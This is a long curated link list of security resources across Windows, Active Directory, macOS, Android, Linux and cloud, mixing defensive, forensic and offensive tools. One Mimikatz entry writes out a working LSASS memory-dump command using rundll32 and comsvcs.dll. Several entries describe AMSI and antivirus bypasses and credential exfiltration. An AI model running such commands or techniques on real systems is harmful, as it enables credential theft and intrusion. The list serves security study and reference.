• Windows-Insight: The content of this repository aims to assist efforts on analysing inner working principles, functionalities, and properties of the Microsoft Windows operating system. This repository stores relevant documentation as well as executable files needed for conducting analysis studies.
• Fully working SMB protocol implementation in webassembly
• Parent Process vs. Creator Process
• WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732) IS USED BY BITTER APT IN TARGETED ATTACK
• ntvdmx64: Run Microsoft Windows NTVDM (DOS) on 64bit Editions
• Spectre exploits in the "wild"
• RegRipper
• Security rapid modernization plan.
• Windows & Active Directory Exploitation Cheat Sheet and Command Reference
• Finding writable folders and hijackable DLLs
• OffensiveCSharp: Collection of Offensive C# Tooling.
• Hyper-V internals researches: Internals information about Hyper-V.
• Do You Really Know About LSA Protection (RunAsPPL)?. Bypassing LSA Protection in Userland PPLdump: Dump the memory of a PPL with a userland exploit. comments
• fibratus: A modern tool for the Windows kernel exploration and tracing.
• MSTSC Packet Dump Utility: The mstscdump utility allows unencrypted RDP packets being sent or received by MSTSC.EXE (or any other application that loads MSTSCAX.DLL) to be captured into a PCAP file for later analysis in various tools such as Microsoft Message Analyzer, Microsoft Network Monitor, or WireShark. It also demonstrates how to hook into the ActiveX interfaces exposed by MSTSCAX.DLL.
• How to bypass Defender in a few easy steps
• Running NetworkMiner in Windows Sandbox
• Windows Desktop: History and analysis of Windows desktop images.
• A collection of tools to interact with Microsoft Security Response Center API
• GetTempPathW function
• No Longer Just Theory: Black Lotus Labs Uncovers Linux Executables Deployed As Stealth Windows Loaders
• Human-operated ransomware: Human-operated ransomware is a large and growing attack trend that represents a threat to organizations in every industry.
• Sharing the first SimuLand dataset to expedite research and learn about adversary tradecraft
• Microsoft Security Best Practices
• No Longer Just Theory: Black Lotus Labs Uncovers Linux Executables Deployed As Stealth Windows Loaders
• Awesome Windows Domain Hardening: A curated list of awesome Security Hardening techniques for Windows.
• Event Log Explorer™ for Windows event log analysis
• Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory
• EVERYONE GETS A ROOTKIT: Eclypsium Researchers Identify Weakness in Microsoft WPBT Impacting All Windows-based Devices Since Windows 8.
• Six Facts about Address Space Layout Randomization on Windows
• How to bypass Defender in a few easy steps
• whids: Open Source EDR for Windows.
• Backdoor .NET assemblies with… dnSpy
• Windows-auditing-mindmap: Set of Mindmaps providing a detailed overview of the different #Windows auditing capacities and event log files.
• If you ever see RDP events, you should parse out the RDP bitmap cache. It maps out bitmap images of a user's RDP session. You can find these bitmaps at this location: %APPDATALOCAL%\Microsoft\Terminal Server Client\Cache\
• Here are a few tool resources for using WinRM w/o PowerShell
  • winrs
  • Scripting in Windows Remote Management
  • CSharpWinRM:.NET 4.0 WinRM API Command Execution
  • WinRMDLL: C++ WinRM API via Reflective DLL
  • WSMan-WinRM: A collection of proof-of-concept source code and scripts for executing remote commands over WinRM using the WSMan.Automation COM object.
  • pywinrm: is a Python client for the Windows Remote Management (WinRM) service. It allows you to invoke commands on target Windows machines from any machine that can run Python.
  • Abusing Windows Remote Management (WinRM) with Metasploit
• LACheck: Multithreaded C# .NET Assembly Local Administrative Privilege Enumeration.
• awesome_windows_logical_bugs: collect for learning cases
• Attacking RDP from Inside: How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more
• Dynamic Invocation in .NET to bypass hooks
• LowBox Token Permissive Learning Mode
• DInjector: Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL.
• SMB-Session-Spoofing: The goal of this program is to create a fake SMB Session.
• Windows Kernel Introspection (WKI)
• MSSQL Analysis Services - Coerced Authentication: A technique to coerce a Windows SQL Server to authenticate on an arbitrary machine.
• Reinschauer: A PoC to remotely control Windows machines over Websockets.
• Lsass Shtinkering: New method of dumping LSASS by abusing the Windows Error Reporting service. It sends a message to the service with the ALPC protocol to report an exception on LSASS. This report will cause the service to dump the memory of LSASS.
• Windows Persistence Techniques
• Windows XP / Windows Server 2003 VLK key generator
• Banshee: Experimental Windows x64 Kernel Driver/Rootkit.

Active Directory

• Active Directory Control Paths
• Gaining Domain Admin from Outside Active Directory, using Responder(LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay)
• Invoke-ADLabDeployer: Automated deployment of Windows and Active Directory test lab networks. Useful for red and blue teams.
• PowerShellClassLab: This is a set of Azure Resource Manager Templates that generates an Active Directory lab consisting of a Domain Controller, two Windows servers and a Linux server.
• ADImporter
• Low Privilege Active Directory Enumeration from a non-Domain Joined Host
• Active Directory as a C2
• Escalating privileges with ACLs in Active Directory
• Active Directory Kill Chain Attack & Defense: This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Modern Post Exploitation Adversary Tradecraft Activity.
• #TR19 Active Directory Security Track
• Penetration Testing Active Directory, Part I: I’ve had several customers come to me before a pentest and say they think they’re in a good shape because their vulnerability scan shows no critical vulnerabilities and that they’re ready for a pentest, which then leads me to getting domain administrator in fifteen minutes by just exploiting misconfigurations in AD.
• Penetration Testing Active Directory, Part II: For most of this part of the series, I will use the rsmith user credentials, as they are low-level, forcing us to do privilege escalation.
• Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory.
• Exploiting PrivExchange: The PrivExchange tool simply logs in on Exchange Web Services to subscribe to push notifications to a specific host.
• BloodHound:
  • BloodHound: Six Degrees of Domain Admin, and a Python based ingestor for BloodHound
  • BloodHound Database Creator: This python script will generate a randomized data set for testing BloodHound features and analysis.
  • Case Study: Password Analysis with BloodHound
  • Introducing BloodHound 4.0: The Azure Update
  • SharpHound3
  • ATTACK MAPPING WITH BLOODHOUND
  • aclpwn.py: Active Directory ACL exploitation with BloodHound. Exploit ACL Based Privilege Escalation Paths in Active Directory
  • BloodHound.py: A Python based ingestor for BloodHound.
  • BloodHound-Tools: Collection of tools that reflect the network dimension into Bloodhound's data.
• Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT) - The Hacker Recipes:
  • Pass the Certificate
  • UnPAC the hash
  • Shadow Credentials
  • Certificate Services (AD-CS)
  • Certificate templates
  • CA configuration
  • Access controls
  • Web endpoints
• Kerberos:
  • Using Kerberos for Authentication Relay Attacks
  • Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT)
  • Kerberos Resource-Based Constrained Delegation: When an Image Change Leads to a Privilege Escalation
  • New-KrbtgtKeys.ps1: This script will enable you to reset the krbtgt account password and related keys while minimizing the likelihood of Kerberos authentication issues being caused by the operation.
  • Kerberos cheatsheet: A cheatsheet with commands that can be used to perform kerberos attacks.
• Bypassing AD account lockout for a compromised account
• Azure AD and ADFS best practices: Defending against password spray attacks
• NetNTLMtoSilverTicket: SpoolSample -> Responder w/NetNTLM Downgrade -> NetNTLMv1 -> NTLM -> Kerberos Silver Ticket.
• Domain Goodness – How I Learned to LOVE AD Explorer
• windapsearch: Python script to enumerate users, groups and computers from a Windows domain through LDAP queries
• LDAP Ping and Determining Your Machine’s Site
• Non-Admin NTLM Relaying & ETERNALBLUE Exploitation
• Active Directory administrative tier model
• Exchange-AD-Privesc: Exchange privilege escalations to Active Directory
• Hunting for reconnaissance activities using LDAP search filters
• Faking an AD account password change is possible , but detectable..
• Ethical Hacking Lessons — Building Free Active Directory Lab in Azure
• Configure the log analytics wizard
• Reset the krbtgt account password/keys
• GetNPUsers & Kerberos Pre-Auth Explained
• WinPwn: Automation for internal Windows Penetrationtest / AD-Security
• BadBlood by @davidprowe, Secframe.com, fills a Microsoft Active Directory Domain with a structure and thousands of objects. The output of the tool is a domain similar to a domain in the real world. After BadBlood is ran on a domain, security analysts and engineers can practice using tools to gain an understanding and prescribe to securing Active…
• Vulnerable-AD: Create a vulnerable active directory that's allowing you to test most of the active directory attacks in a local lab .
• EXTRACTING PASSWORD HASHES FROM THE NTDS.DIT FILE
• Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
• Active Directory Lab Setup Tool. ADLab: Active Directory Lab for Penetration Testing
• Rubeus: is a C# toolset for raw Kerberos interaction and abuses.
• Enabling Active Directory DNS query logging
• SharpMapExec: This tool is made to simplify penetration testing of networks and to create a swiss army knife that is made for running on Windows which is often a requirement during insider threat simulation engagements.
• Detecting CVE-2020-1472 (CISA ED 20-04) Using Splunk Attack Range
• ADTimeline: Timeline of Active Directory changes with replication metadata.
• Still Passing the Hash 15 Years Later
• Azure-Sentinel: Cloud-native SIEM for intelligent security analytics for your entire enterprise.
• Detecting Abuse of Authentication Mechanisms
• Detecting the Elusive: Active Directory Threat Hunting
• Exporting AD FS certificates revisited: Tactics, Techniques and Procedures
• GPO Abuse: “You can’t see me”
• SERVER (UN)TRUST ACCOUNT: Active Directory persistence through userAccountControl manipulation.
• Active Directory Certificate Services (ADCS - PKI) domain admin vulnerability When discussing ADCS attacks, particularly ESC8, most go straight for the DC$ account.
• DSInternals: Directory Services Internals (DSInternals) PowerShell Module and Framework.
• Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).
• Cobalt strike MANUALS_V2 Increasing privileges and collecting information
• Active Directory (Attack & Defense )
• Your Azure AD Connect server ... it's a Tier 0 asset
• Shooting Up: On-Prem to Cloud — Detecting “AADConnect” Creds Dump
• AADInternals: PowerShell module for administering Azure AD and Office 365.
• From Zero to Domain Admin
• Attacking Active Directory: 0 to 0.9
• Offensive WMI - Active Directory Enumeration - Part 2, 3, 4 and 5.
• BloodyAD is an Active Directory Privilege Escalation Framework.
• SID filter as security boundary between domains? (Part 7) - Trust account attack - from trusting to trusted
• KrbRelayUp: a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).
• Harvesting Active Directory credentials via HTTP Request Smuggling
• Ping Castle Cloud: Audit program for AzureAD.
• Protection of privileged users and groups by Azure AD Restricted Management Administrative Units source

Mimikatz

• Active Directory Kill Chain Attack & Defense: This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Modern Post Exploitation Adversary Tradecraft Activity.
• A little tool to play with Windows security
• Preventing Mimikatz Attacks – Blue Team – Medium
• pypykatz: Mimikatz implementation in pure Python
• Walk-through Mimikatz sekurlsa module
• (pt-br) Mimikatz: Mitigando ataques de roubo de credenciais
• PERFORMING PASS-THE-HASH ATTACKS WITH MIMIKATZ
• SharpKatz: Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
• Protecting RDP Passwords from Mimikatz Using Remote Credential Guard
• Updating Mimikatz in Metasploit
• Capturing Credentials with mimikatz
• Dumping User Passwords from Windows Memory with Mimikatz
• HandleKatz: PIC lsass dumper using cloned handles.
• CredentialDumping without Mimikatz rundll32.exe comsvcs.dll, MiniDump (Get-Process lsass).Id Temp\<NAME>.dmp full;Wait-Process -Id (Get-Process rundll32).id
• Dumping Lsass Without Mimikatz

Powershell

• PowerShell Gallery
• PowerShell Scripts: Collection of PowerShell scripts
• Example of Malicious DLL Injected in PowerShell
• POWERSHELL LOGGING: OBFUSCATION AND SOME NEW(ISH) BYPASSES PART 1
• Empire: Empire is a PowerShell and Python 3.x post-exploitation framework.
• Invisi-Shell: Hide your Powershell script in plain sight. Bypass all Powershell security features.
• DevSec Defense- How DevOps Practices Can Drive Detection Development For Defenders
• Chimera: is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.
• Geeking out with UEFI, again
• PrivescCheck: Privilege Escalation Enumeration Script for Windows
• Stracciatella: OpSec-safe Powershell runspace from within C# (aka SharpPick) with AMSI, Constrained Language Mode and Script Block Logging disabled at startup
• Invoke-PSImage: Embeds a PowerShell script in the pixels of a PNG file and generates a oneliner to execute
• Invoke-TheHash: powerShell Pass The Hash Utils
• DeepBlueCLI: DeepBlueCLI - a PowerShell Module for Threat Hunting via Windows Event Logs.
• PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection
• CheeseTools: Self-developed tools for Lateral Movement/Code Execution.
• Random: a lot of powershell scripts.
• CredPhish: is a PowerShell script designed to invoke legitimate credential prompts and exfiltrate passwords over DNS.
• PowerShell Obfuscation
• powercat: netshell features all in version 2 powershell.
• PSByPassCLM: Bypass for PowerShell Constrained Language Mode.
• Basic PowerShell for Pentesters
• Invoke-CradleCrafter: PowerShell Remote Download Cradle Generator & Obfuscator. the-invoke-cradlecrafter-overview
• LDAP Monitor: Monitor creation, deletion and changes to LDAP objects live during your pentest or system administration!
• Understanding and Bypassing AMSI
• Exploring PowerShell AMSI and Logging Evasion
• AMSI.fail: generates obfuscated PowerShell snippets that break or disable AMSI for the current process. code
• INTRODUCTION TO SANDBOX EVASION AND AMSI BYPASSES
• PSBits: Simple (relatively) things allowing you to dig a bit deeper than usual.
• Evading Detection: A Beginner's Guide to Obfuscation
• comsvcs MiniDump examples
• Beginning PowerShell Empire - Packet Analysis

Office and O/365

• Detailed properties in the Office 365 audit log
• Office 365 Mail Forwarding Rules (and other Mail Rules too)
• Application Guard for Office (public preview) for admins
• o365spray: Username enumeration and password spraying tool aimed at Microsoft O365.
• AdminSubmissionsAPI scripts for URL and mail submission. Admin Submission API allows submission of URLs, mail messages, file mail messages and files to Microsoft to re-scan and get newest verdict on submitted entity. Admin Submissions API is available both to Exchange Online Protection customers as well as to Office 365 ATP customers.
• Commentator: Commentator is a tool written in PowerShell to add a comment to the file properties of a Microsoft Office document (xlsx/m, docx/m, or pptx/m).
• Exploiting MFA Inconsistencies on Microsoft Services. MFASweep: A tool for checking if MFA is enabled on multiple Microsoft Services
• msoffcrypto-tool: Python tool and library for decrypting MS Office files with passwords or other keys
• pyxlsb2: an Excel 2007+ Binary Workbook (xlsb) parser for Python
• Making Clouds Rain :: Remote Code Execution in Microsoft Office 365
• The worst of the two worlds: Excel meets Outlook
• Go365: An Office365 User Attack Tool.
• Microsoft-365-Defender-Hunting-Queries: Sample queries for Advanced hunting in Microsoft 365 Defender
• m365_groups_enum: Enumerate Microsoft 365 Groups in a tenant with their metadata.
• How to hunt for LDAP reconnaissance within M365 Defender?
• Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs
• Reproducing The ProxyShell Pwn2Own Exploit
• ProxyLogon is Just the Tip of the Iceberg: A New Attack Surface on Microsoft Exchange Server!
• PROXYTOKEN: AN AUTHENTICATION BYPASS IN MICROSOFT EXCHANGE SERVER
• How Default Permissions on Microsoft Power Apps Exposed Millions
• Excel Recipe: Some VBA Code with a Touch of Excel4 Macro
• An XML-Obfuscated Office Document (CVE-2021-40444)
• Simple Analysis Of A CVE-2021-40444 .docx Document
• cli-microsoft365: Manage Microsoft 365 and SharePoint Framework projects on any platform. site export teams conversations
• There’s multiple threat actors using OneDrive in campaigns, straight up just linking OneDrive.
• Advanced hunting queries for Microsoft 365 Defender: Sample queries for Advanced hunting in Microsoft 365 Defender.
• All Your (d)Base Are Belong To Us, Part 2: Code Execution in Microsoft Office (CVE-2021–38646)
• MSSpray is used to conduct password spray attacks against Azure AD as well as validate the implementation of MFA on Azure and Office 365 endpoints
• Comparison of MOTW (Mark of the Web) propagation support of archiver software for Windows
• SnaffPoint: A tool for pointesters to find candies in SharePoint.

macOS/iOS

• Apple Open Source and Unnoficial Apple Open Source Mirror: security mirror.
• An iOS App In Assembly
• Having fun with macOS 1days
• x18-leak: iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation.
• EmPyre: A post-exploitation OS X/Linux agent written in Python 2.7
• Kanzi: It's a cable that's used by Apple's own engineers to debug various hardware (mainly iOS-devices, of course) with SWD (Serial Wire Debug - JTAG for ARM cores) - Apple Lightning (cont.) - serial number reading. kanzitools: Set of tools to interact with various aspects of Kanzi probe and its derivatives.
• SDQAnalyzer: a Saleae analyzer plugin for the SDQ (Apple Lightning, MagSafe, Battery) protocol.
• Inside Code Signing
• jelbrekTime: An developer jailbreak for Apple watch S3 watchOS 4.1
• Disabling MacOS SIP via a VirtualBox kext Vulnerability
• mOSL: Bash script to audit and fix macOS High Sierra (10.13.x) security settings
• Objective-See:
  • DoNotDisturb: Detect Evil Maid Attacks
  • sniffMK: sniff mouse and keyboard events
  • Remote Mac Exploitation Via Custom URL Schemes
  • The Mac Malware of 2018
• KisMac2: KisMAC is a free, open source wireless stumbling and security tool for Mac OS X.
• osx-security-awesome: A collection of OSX and iOS security resources
• threadexec: A library to execute code in the context of other processes on iOS 11.
• Knowledge is Power! Using the macOS/iOS knowledgeC.db Database to Determine Precise User and Application Usage
• iOS12 Kernelcache Laundering
• kernelcache-laundering: load iOS12 kernelcaches and PAC code in IDA
• Armor: is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners. Tool Designed To Create Encrypted macOS Payloads
• inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c
• opendrop: An open Apple AirDrop implementation written in Python
• A sample of the iOS malware- sha256:0d2ee9ade24163613772fdda201af985d852ab506e3d3e7f07fb3fa8b0853560
• ipwndfu: open-source jailbreaking tool for older iOS devices.
• Pair Locking your iPhone with Configurator 2
• KTRW: The journey to build a debuggable iPhone.
• Privilege Escalation | macOS Malware & The Path to Root Part 2. JSS-Scripts: Random scripts for use in the Jamf Pro.
• MacOS Red Teaming 211: Dylib Hijacking
• iOS Application Injection: Having been interested jailbreaking iOS devices for going on almost a decade, mixing security and this makes sense. Within this entry, I document my method of checking if an application can have code injected.
• The Mac Malware of 2019 👾: a comprehensive analysis of the year's new malware
• OSX.EvilQuest Uncovered
• Low-Level Process Hunting on macOS
• CVE-2020–9934: Bypassing TCC ...for unauthorized access to sensitive user data!
• Attack Secure Boot of SEP windknown@pangu
• Compromising the macOS Kernel through Safari by Chaining Six Vulnerabilities
• Sinter: New user-mode security enforcement for macOS. A user-mode application authorization system for MacOS written in Swift
• Who put that in my Full Disk Access list? ssh and Mojave’s privacy protection
• macOS-Fortress: Firewall and Privatizing Proxy for Trackers, Attackers, Malware, Adware, and Spammers with Anti-Virus On-Demand and On-Access Scanning (PF, squid, privoxy, hphosts, dshield, emergingthreats, hostsfile, PAC file, clamav).
• From zero to tfp0 - Part 1: Prologue
• From zero to tfp0 - Part 2: A Walkthrough of the voucher_swap exploit
• We Hacked Apple for 3 Months: Here’s What We Found, some useful scripts available
• MACOS INJECTION VIA THIRD-PARTY FRAMEWORKS
• NetworkSniffer: Log iOS network traffic without a proxy
• IPv6 security
• OpenHaystack: Build your own 'AirTags' label today! Framework for tracking personal Bluetooth devices via Apple's massive Find My network.
• All Your Macs Are Belong To Us: bypassing macOS's file quarantine, gatekeeper, and notarization requirements
• macOS Security Compliance Project, nist
• Introducing Mystikal: macOS Initial Access Payload Generator.
• Mythic-Macro-Generator
• macOSTools: macOS Offensive Tools
• TrueTree: A command line tool for pstree-like output on macOS with additional pid capturing capabilities.
• Zero-Day TCC bypass discovered in XCSSET malware
• Dissecting the Apple M1 GPU, part I and issecting the Apple M1 GPU, part IV
• macos_shell_memory: Execute MachO binaries in memory using CGo.
• pwn-my: iOS 14.5 WebKit/Safari based Jailbreak
• M1RACLES: M1ssing Register Access Controls Leak EL0 State. CVE-2021-30747 is a covert channel vulnerability in the Apple Silicon “M1” chip.
• Vulnerability Spotlight: A deep dive into macOS SMB server
• How to Use Kerberos on macOS
• Bypassing macOS TCC User Privacy Protections By Accident and Design
• Anecdotes About the macOS Sandbox File Limit
• SSD Advisory – macOS Finder RCE: Find out how a vulnerability in macOS Finder system allows remote attackers to trick users into running arbitrary commands.
• How malware gets into the App Store and why Apple can't stop that
• Quick Analysis for the SSID Format String Bug
• De Rebus Antiquis: This article aims to explain how to exploit the recursive stack overflow bug in the iOS 7 bootchain. page source, ios-kexec-utils, iRecovery -> new repo, iOS GID Key
• AirTag Scripts & Resources: AirTag instrumentation including AirTechno and firmware downgrades.
• Pegasus ID: After extensive research and understanding of how Pegasus Spyware is operating inside of iOS and AndroidOS systems I have created tools that will be able to identify & validate the presence of the spyware on your mobile devices, and tablets. Initial detection points were derived from the mvt-project.
• UTM: Securely run operating systems on your Mac. repo
• qemu-t8030: iPhone 11 emulated on QEMU.
• Dissecting TriangleDB, a Triangulation spyware implant

Mobile

• Today I make public ALL recordings and updated slides (+ FAQ) for my mobile security class, MOBISEC 2020! Slides & Recordings

Android

• android-security-awesome: A collection of android security related resources.
• tip toeing past android 7’s network security configuration
• A Story About Three Bluetooth Vulnerabilities in Android
• Creating an Android Open Source Research Device on Your PC
• Droidefense: Advance Android Malware Analysis Framework
• android-device-check: Check Android device security settings
• Project Zero: OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB
• I'm looking at a Huawei P20 from China, let see what can I found
• Tracking down the developer of Android adware affecting millions of users
• CLI tool to analyze APKs
• Breaking Samsung's Root of Trust: Exploiting Samsung S10 S-Boot
• TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices
• Exploiting Android Messengers with WebRTC: Part 3
• setools-android: Unofficial port of setools to Android with additional sepolicy-inject utility included.
• Security Guidelines: OpenHarmony is an open OS that allows you to easily develop services and applications. It provides an execution environment to ensure security of application data and user data.
• Proxying Android app traffic – Common issues / checklist
• Magisk: is a suite of open source software for customizing Android, supporting devices higher than Android 5.0.
• Magisk Trust User Certs: A Magisk module that automatically adds user certificates to the system root CA store.
• MagiskFrida: Run frida-server on boot with Magisk, always up-to-date.
• Android-PIN-Bruteforce: Unlock an Android phone (or device) by bruteforcing the lockscreen PIN. Turn your Kali Nethunter phone into a bruteforce PIN cracker for Android devices! (no root, no adb).
• Mobile Threat Catalogue: NIST/NCCoE Mobile Threat Catalogue.
• CiLocks: Crack Interface lockscreen, Metasploit and More Android/IOS Hacking.
• mvt: MVT is a forensic tool to look for signs of infection in smartphone devices.
• Oscorp evolves into UBEL: an advanced Android malware spreading across the globe
• Android Application Penetration Testing Checklist
• 50 secrets codes on Android
• MobSecco: Cloning apk for bypassing code tampering detection, Google Safety Net and scanning vulnerable plugins.

Linux/ *Nix

• BCC: Tools for BPF-based Linux IO analysis, networking, monitoring, and more
• OpenSnitch is a GNU/Linux port of the Little Snitch application firewall
• Security Onion:Linux distro for IDS, NSM, and Log Management
• Linux Kernel Defence Map
• wcc: The Witchcraft Compiler Collection
• Ground Zero: Reverse Engineering:
  • Part 1-2: Password Protected Reverse Shells – Linux x64
  • Active Directory Dojo:
    • Active Directory Penetration Dojo - Setup of AD Penetration Lab : Part 1 - ScriptDotSh
    • Active Directory Penetration Dojo- Setup of AD Penetration Lab : Part 2 - ScriptDotSh
    • Active Directory Penetration Dojo- Creation of Forest Trust: Part 3 - ScriptDotSh
    • Active Directory Penetration Dojo – AD Environment Enumeration -1 - ScriptDotSh
• Dmesg under the hood: Dmesg allows us to grasp what's going on under the hood when the kernel gets bad. Check out how dmesg is able to read kernel logs and show to the user.
• Randomize your MAC address using NetworkManager
• Shadow-Box: Lightweight and Practical Kernel Protector for x86 (Presented at BlackHat Asia 2017/2018, beVX 2018 and HITBSecConf 2017) - presentation and other papers
• Privilege Escalation: pentestbook
• Project Zero: A cache invalidation bug in Linux memory management
• Announcing flickerfree boot for Fedora 29
• The Linux Backdoor Attempt of 2003
• (PT-BR) Análise de binários em Linux
• GMER: Rootkit Detector and Remover
• suprotect: Changing memory protection in an arbitrary process
• A look at home routers, and a surprising bug in Linux/MIPS
• (pt-br) Hacking Tricks: Escalação de Privilégio em Linux com Capability
• Basic Linux Privilege Escalation: It's just a basic & rough guide.
• Linux process infection (part I):Among the different tasks that a Red Team should carry out, there is one that is remarkable by its intrinsic craftsmanship: putting an APT inside a computer system and ensuring its persistence.
• tpotce: T-Pot Universal Installer and ISO Creator.
• Linux Privilege Escalation via LXD & Hijacked UNIX Socket Credentials: LXD is a management API for dealing with LXC containers on Linux systems. It will perform tasks for any members of the local lxd group. It does not make an effort to match the permissions of the calling user to the function it is asked to perform.
• Linuxprivchecker.py: A Linux Privilege Escalation Check Script.
• Linux Kernel exploitation Tutorial.
• ebpf_exporter: Prometheus exporter for custom eBPF metrics
• Zydra: is a file password recovery tool and Linux shadow file cracker. It uses the dictionary search or Brute force method for cracking passwords.
• A gentle introduction to Linux Kernel fuzzing - code
• Teardown of a Failed Linux LTS Spectre Fix: Today's blog will serve as a deep dive into a recent Spectre fix, one of dozens being manually applied to the upstream Linux kernel. We'll cover the full path this fix took, from its warning-inducing initial state to its correction upstream and then later brokenness when backported to all of the upstream Long Term Support (LTS) kernels.
• Ropstar: Automatic exploit generation for simple linux pwn challenges.
• Ken Thompson's Unix password
• Exploiting Wi-Fi Stack on Tesla Model S
• dlinject.py: Inject a shared library (i.e. arbitrary code) into a live linux process, without ptrace
• (Ab)using Kerberos from Linux
• LKRG: Linux Kernel Runtime Guard
• Privilege Escalation via Python Library Hijacking
• Logging Passwords on Linux
• Kicksecure ™: A Security-hardened, Non-anonymous Linux Distribution
• Setuid Demystified
• ProcDump-for-Linux: A Linux version of the ProcDump Sysinternals tool
• OPNsense GUI, API and systems backend
• static-binaries: Various *nix tools built as statically-linked binaries.
• Traitor: Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins ⬆️ ☠️
• traitor
• ProcMon-for-Linux: is a Linux reimagining of the classic Procmon tool from the Sysinternals suite of tools for Windows. Procmon provides a convenient and efficient way for Linux developers to trace the syscall activity on the system.
• OSWatcher: A framework to track the evolution of Operating Systems over time.
• Producing a trustworthy x86-based Linux appliance
• Running a quick NMAP scan to inventory my network
• Packet Strider: A network packet forensics tool for SSH.
• telfhash (Trend Micro ELF Hash): Symbol hash for ELF files.
• 64-bit Linux stack smashing tutorial: Part 1
• Hardening ELF binaries using Relocation Read-Only (RELRO)
• Linux Threat Report 2021 1H
• Learning Linux Kernel Exploitation - Part 1 Part 2
• Microsoft finds new elevation of privilege Linux vulnerability, Nimbuspwn
• So You Wanna Pwn The Kernel?
• SMB “Access is denied” caused by anti-NTLM relay protection

Cloud

• Scout Suite: Multi-Cloud Security Auditing Tool
• Cloud Security Research: Cloud-related research releases from the Rhino Security Labs team.
• gVisor: is an application kernel, written in Go, that implements a substantial portion of the Linux system surface.
• PARSEC: Platform AbstRaction for SECurity service
• Cloud Security Alliance: The Cloud Security Alliance (CSA) is the world’s leading organization dedicated to defining and raising awareness of best practices to help ensure a secure cloud computing environment.
• CIS Controls Cloud Companion Guide
• CloudFail: Utilize misconfigured DNS and old database records to find hidden IP's behind the CloudFlare network
• (discontinued) HatCloud
• Uncovering bad guys hiding behind CloudFlare
• CloudFlair: Find origin servers of websites behind CloudFlare by using Internet-wide scan data from Censys.
• thsosrtl: Repo for tools - cloud and vpn. cloudIP: was originally thought of for attempting to resolve the true IP address of targets running through cloudflare.
• Malicious Shell Script Steals Cloud Credentials
• badPods: A collection of manifests that will create pods with elevated privileges.
• carbon-black-cloud-sdk-python VMware Carbon Black Cloud Python SDK.
• Baserunner: A tool for exploring Firebase datastores.
• A SOC Tried To Detect Threats in the Cloud … You Won’t Believe What Happened Next
• The Cloud Native Computing Foundation (CNCF) hosts critical components of the global technology infrastructure.
• Checkov is a static code analysis tool for infrastructure-as-code.
• KICS stands for Keeping Infrastructure as Code Secure, it is open source and is a must-have for any cloud native project. KICS finds security vulnerabilities, compliance issues, and infrastructure misconfigurations in following Infrastructure as Code solutions: Terraform, Kubernetes, Docker, AWS CloudFormation, Ansible. 1900+ queries are available.
• 10 real-world stories of how we’ve compromised CI/CD pipelines
• GitHub Action Runners, Analyzing the Environment and Security in Action.

GCP/Google

• gcp dhcp takeover code exec: Google Compute Engine (GCE) VM takeover via DHCP flood - gain root access by getting SSH keys added by google_guest_agent
• New research: How effective is basic account hygiene at preventing hijacking Five things you can do right now to stay safer online

Azure

• SimuLand: Understand adversary tradecraft and improve detection strategies.
• Azure-Readiness-Checklist: This checklist is your guide to the best practices for deploying secure, scalable, and highly available infrastructure in Azure. Before you go live, go through each item, and make sure you haven't missed anything important!
• Preventing Exposed Azure Blob Storage
• Open Azure blobs search on grayhatwarfare.com and other updates
• ChaosDB: is an unprecedented critical vulnerability in the Azure cloud platform that allows for remote account takeover of Azure’s flagship database - Cosmos DB.
• Introducing Project Freta: Toward trusted sensing for the cloud. docs
• Finding Azurescape: Cross-Account Container Takeover in Azure Container Instances
• Azure Monitor: Malicious KQL Query

AWS

• git-secrets: Prevents you from committing secrets and credentials into git repositories.
• CloudMapper: CloudMapper helps you analyze your Amazon Web Services (AWS) environments.
• Security Monkey: Security Monkey monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time.
• my-arsenal-of-aws-security-tools: List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.
• RKMS: RKMS is a highly available key management service, built on top of AWS's KMS.
• FireProx: AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation.
• AWS IAM privileges as found using the AWS Policy Generator described at
• Sadcloud: A tool for standing up (and tearing down!) purposefully insecure cloud infrastructure.
• Endgame: Creating Backdoors in AWS.
• Bucky: An automatic S3 bucket discovery tool.
• Prowler: Prowler is a security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness.
• barq: The AWS Cloud Post Exploitation framework!
• Text → AWS IAM Policy: Describe your ideal AWS IAM Policy in plain text and will use GPT-3 from Open AI to generate an AWS IAM policy.

Risk Assessment and Vulnerability Management

• (PT-BR) Gerenciamento de Risco Cibernético
• RITA (Real Intelligence Threat Analytics)
• Blended threats are the future, because no matter how good your cloud security is, at some point a grumpy SRE who feels jilted over some work BS is gonna enjoy pulling one over on those C suite assholes, for $20k cash by grugq.
• ISO27001 audit in real-time....
• Gearing Towards Your Next Audit: Understanding the Difference Between Best Practice Frameworks and Regulatory Compliance Standards.
